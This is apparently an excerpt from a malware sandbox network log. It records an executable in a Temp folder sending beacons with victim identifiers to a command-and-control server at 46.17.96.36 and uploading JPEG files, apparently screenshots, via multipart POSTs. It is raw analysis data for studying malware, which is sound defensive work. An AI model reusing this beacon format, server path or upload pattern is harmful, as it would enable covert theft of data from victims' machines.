                                        Date: Sun, 29 Aug 2021 20:28:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:20.332298994 CEST14501OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:20.332416058 CEST14501OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:20.332640886 CEST14511OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:20.332849979 CEST14514OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:20.368993998 CEST14517OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:20.369034052 CEST14525OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:20.369117975 CEST14533OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:20.369518042 CEST14536OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:20.369548082 CEST14541OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:20.405579090 CEST14562OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:20.405643940 CEST14581OUTData Raw: 69 5a 00 c5 3b 14 98 a2 c3 b8 a2 97 14 0a 76 29 89 88 29 71 cd 18 a7 77 a6 48 80 53 80 cd 25 38 55 22 58 84 52 62 9e 45 25 0c 06 e2 96 97 14 b8 a6 02 01 4e 14 01 4b 40 98 52 1a 75 03 93 4c 40 a2 a4 51 4d a9 07 02 ad 22 1b 1a d4 ca 94 8e 2a 32 28
                                        Data Ascii: iZ;v))qwHS%8U"XRbE%NK@RuL@QM"*2(` RB(R<V4Q@$QNHD)jKERJM6u cih)i)GZsKLAP(:)ANpLuE!1hP#c6z7s5Q}Ma
                                        Aug 29, 2021 22:28:20.516369104 CEST14609INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        217192.168.2.44995646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:20.494779110 CEST14609OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:20.574024916 CEST14609INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        218192.168.2.44995746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:20.908024073 CEST14610OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:20.982048035 CEST14700INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        219192.168.2.44995846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:20.909310102 CEST14611OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:20.909427881 CEST14611OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:20.909615040 CEST14621OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:20.909750938 CEST14624OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:20.941668034 CEST14626OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:20.941728115 CEST14632OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:20.941745996 CEST14634OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:20.941993952 CEST14644OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:20.942138910 CEST14649OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:20.974196911 CEST14655OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:20.974262953 CEST14657OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:21.078622103 CEST14719INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        22192.168.2.44975746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:18.509087086 CEST3391OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:18.509524107 CEST3391OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:18.509850979 CEST3401OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:18.510364056 CEST3404OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:18.541722059 CEST3415OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:18.542049885 CEST3424OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:18.542174101 CEST3429OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:18.573854923 CEST3432OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:18.573883057 CEST3437OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:18.573900938 CEST3440OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:18.574031115 CEST3451OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:18.676027060 CEST3498INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:18 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        220192.168.2.44995946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:21.206777096 CEST14720OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:21.282018900 CEST14720INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:21.388977051 CEST14720OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:21.389081955 CEST14721OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:21.389246941 CEST14731OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:21.389328003 CEST14733OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:21.422152996 CEST14741OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
